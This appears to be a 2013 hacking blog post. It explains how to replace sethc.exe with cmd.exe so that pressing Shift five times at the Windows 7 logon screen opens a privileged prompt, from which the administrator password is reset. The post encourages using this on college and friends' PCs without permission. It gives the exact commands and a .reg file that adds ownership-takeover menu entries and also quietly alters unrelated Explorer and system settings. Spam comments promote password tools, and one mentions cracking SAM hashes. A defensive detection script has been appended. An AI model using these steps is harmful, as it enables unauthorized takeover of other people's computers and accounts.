Hacker

Monday 8 April 2013

Recovering Windows 7 "Administrator" password (Ultimate Hack)

"How to Recover Windows 7 Administrator password"

"Ultimate hack"


I am back, my readers, with a new hacking guide. Today I am writing about "recovering Windows 7 administrator password" using my hacking guide.

Ever wanted to hack your college PC with a guest/student account, or just wanted to hack your friend's PC to make him gawk when you tell him your success story of hacking? Well, there is a great way of hacking an administrator account from a guest account, by which you can reset the administrator password and get all the privileges an administrator enjoys on Windows. Interested? Read on…

Concept:

Press the Shift key 5 times and the Sticky Keys dialog shows up. This works even at the logon screen. But if we replace sethc.exe, which is responsible for the Sticky Keys dialog, with cmd.exe, and then call sethc.exe by pressing the Shift key 5 times at the logon screen, we will get a command prompt with administrator privileges because no user has logged on. From there we can hack the administrator password, even from a guest account.

Prerequisites:

Guest account with write access to system32.

Here is how to do that -

* Go to C:/windows/system32
* Copy cmd.exe and paste it on the desktop
* Rename cmd.exe to sethc.exe
* Copy the new sethc.exe to system32. When Windows asks whether to overwrite the existing sethc.exe, click Yes.
* Now log off from your guest account and, at the user select window, press the Shift key 5 times.
* Instead of the Sticky Keys confirmation dialog, a command prompt with full administrator privileges will open.
* Now type “NET USER ADMINISTRATOR aaa”, where “aaa” can be any password you like, and press Enter.
* You will see “The command completed successfully”. Then exit the command prompt and log in as administrator with your new password.
* Congrats! You have hacked admin from a guest account.

Note: If you get a "try again" error while replacing the file, it means you have to take ownership of the file you want to replace. To do that, copy and paste the lines below into Notepad, save them as a file with the .reg extension, and then run it. This adds a "Take Ownership" option to the right-click menu. After that, just right-click on the file sethc.exe and take ownership.

Copy and paste the lines below (shown in red in the original post). Besides the "Take Ownership" menu entries, the file also sets unrelated Explorer and timeout values and deletes the Explorer\RemoteComputer key.

Windows Registry Editor Version 5.00

;Created by Aksclusive

[HKEY_CLASSES_ROOT\AllFilesystemObjects\shellex\ContextMenuHandlers\Copy To]
@="{C2FBB630-2971-11D1-A18C-00C04FD75D13}"

[HKEY_CLASSES_ROOT\AllFilesystemObjects\shellex\ContextMenuHandlers\Move To]
@="{C2FBB631-2971-11D1-A18C-00C04FD75D13}"

[HKEY_CURRENT_USER\Control Panel\Desktop]
"AutoEndTasks"="1"
"HungAppTimeout"="1000"
"MenuShowDelay"="8"
"WaitToKillAppTimeout"="2000"
"LowLevelHooksTimeout"="1000"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiskSpaceChecks"=dword:00000001
"LinkResolveIgnoreLinkInfo"=dword:00000001
"NoResolveSearch"=dword:00000001
"NoResolveTrack"=dword:00000001
"NoInternetOpenWith"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control]
"WaitToKillServiceTimeout"="2000"

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RemoteComputer]

[HKEY_CLASSES_ROOT\*\shell\takeownership]
@="Take ownership"
"HasLUAShield"=""
"NoWorkingDirectory"=""

[HKEY_CLASSES_ROOT\*\shell\takeownership\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"

[HKEY_CLASSES_ROOT\exefile\shell\takeownership]
@="Take ownership"
"HasLUAShield"=""
"NoWorkingDirectory"=""

[HKEY_CLASSES_ROOT\exefile\shell\takeownership\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"

[HKEY_CLASSES_ROOT\dllfile\shell\takeownership]
@="Take ownership"
"HasLUAShield"=""
"NoWorkingDirectory"=""

[HKEY_CLASSES_ROOT\dllfile\shell\takeownership\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"

[HKEY_CLASSES_ROOT\Directory\shell\takeownership]
@="Take ownership"
"HasLUAShield"=""
"NoWorkingDirectory"=""

[HKEY_CLASSES_ROOT\Directory\shell\takeownership\command]
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"

If somehow you cannot add the above registry values to the Windows registry, try this method: download a Linux distro that can be run from CD/USB (a live distro like Puppy Linux, Ubuntu, etc.), boot into Linux, and then replace the file sethc.exe with the renamed cmd.exe.

Now you are done. Congrats, you have recovered your Windows 7 administrator password with this hack :)
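
A check a defender can run for the file swap this post describes, as an added example that is not part of the original post. It assumes Windows PowerShell 4.0 or later (for Get-FileHash) and English account names; the function name Test-StickyKeysBinary is made up for illustration.

```powershell
# Added example: audit sethc.exe for the cmd.exe swap and the ownership change
# left behind by the "Take Ownership" menu entry (takeown + icacls).
function Test-StickyKeysBinary {
    param([string]$System32 = (Join-Path $env:SystemRoot 'System32'))

    $sethc    = Join-Path $System32 'sethc.exe'
    $cmd      = Join-Path $System32 'cmd.exe'
    $findings = @()

    if (-not (Test-Path -LiteralPath $sethc)) {
        $findings += 'sethc.exe is missing'
    } else {
        # 1. The version resource is compiled into the binary and survives a
        #    rename, so a renamed cmd.exe still reports "Cmd.Exe" here.
        #    (Some builds report "sethc.exe.mui"; the prefix match allows that.)
        $orig = (Get-Item -LiteralPath $sethc).VersionInfo.OriginalFilename
        if ($orig -notmatch '^sethc\.exe') {
            $findings += "OriginalFilename is '$orig', expected sethc.exe"
        }

        # 2. Byte-identical to the command interpreter.
        $hash = (Get-FileHash -LiteralPath $sethc -Algorithm SHA256).Hash
        if ((Test-Path -LiteralPath $cmd) -and
            $hash -eq (Get-FileHash -LiteralPath $cmd -Algorithm SHA256).Hash) {
            $findings += 'sethc.exe has the same SHA-256 as cmd.exe'
        }

        # 3. System files are owned by TrustedInstaller and grant Administrators
        #    read/execute only; takeown and "icacls /grant administrators:F"
        #    change both.
        $acl = Get-Acl -LiteralPath $sethc
        if ($acl.Owner -ne 'NT SERVICE\TrustedInstaller') {
            $findings += "Owner is '$($acl.Owner)', not TrustedInstaller"
        }
        $fc = [System.Security.AccessControl.FileSystemRights]::FullControl
        $adminFull = $acl.Access | Where-Object {
            $_.IdentityReference.Value -eq 'BUILTIN\Administrators' -and
            $_.AccessControlType -eq 'Allow' -and
            ($_.FileSystemRights -band $fc) -eq $fc
        }
        if ($adminFull) { $findings += 'BUILTIN\Administrators has FullControl' }
    }

    [pscustomobject]@{
        Path = $sethc; Suspicious = ($findings.Count -gt 0); Findings = $findings
    }
}

Test-StickyKeysBinary | Format-List
```

A flagged file can be restored from an elevated prompt with `sfc /scanfile=C:\Windows\System32\sethc.exe`.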

8 comments:

  1. A few days ago, I had met the headache things that I had forgotten Windows login password. The login screen rejected my passwords. I was frustrated because there was very important data on my disk and I couldn't reinstall the OS. ………….
    However, I fortunately got to know the PCUnlocker utility, which is a professional windows password recovery tool for us to reset windows 7 password instantly yet no data loss.
    http://www.top-password.com/reset-windows-password.html

  2. That's not recovering the password; it's resetting it. While most people would be happy with that, the correct answer would be burning an Ubuntu LiveCD/DVD, booting from it, finding the encrypted SAM file (c:\windows\system32\config\sam by default), and cracking the passwords using a program like hashcat.

  3. If you are not newbies and not be urgent to reset your forgotten Windows 7 password, above way maybe we can consider, but most people not. So if you need a easy, quick, safe and effective reset tool I recommend Anmosoft, reset software. You can learn more and download from
    http://www.resetwindowspassword.com/recover-windows-7-password.html

  4. Personally, admin password and reset disk are the best way to reset Windows 7 password normally. But if above two ways are not helpful or you don't have I think Windows Login Recovery will be your best choice, like "Ekachakra" said.

  5. To hack Windows 7 admin password you can use Windows Password Killer directly, for another ways normally are not effective in your situation.

  6. how do I run the .reg notepad file created above admin???

  7. It is a happy tour for me to read your post. Here you can try to use the tool-Windows Password Key to recover Windows 7 administrator password. More details about how to use Windows Password Key to recover Windows 7 administrator password is on here. http://www.lostwindowspassword.com/article/reset-windows-7-administrator-password.html

  8. This comment has been removed by the author.
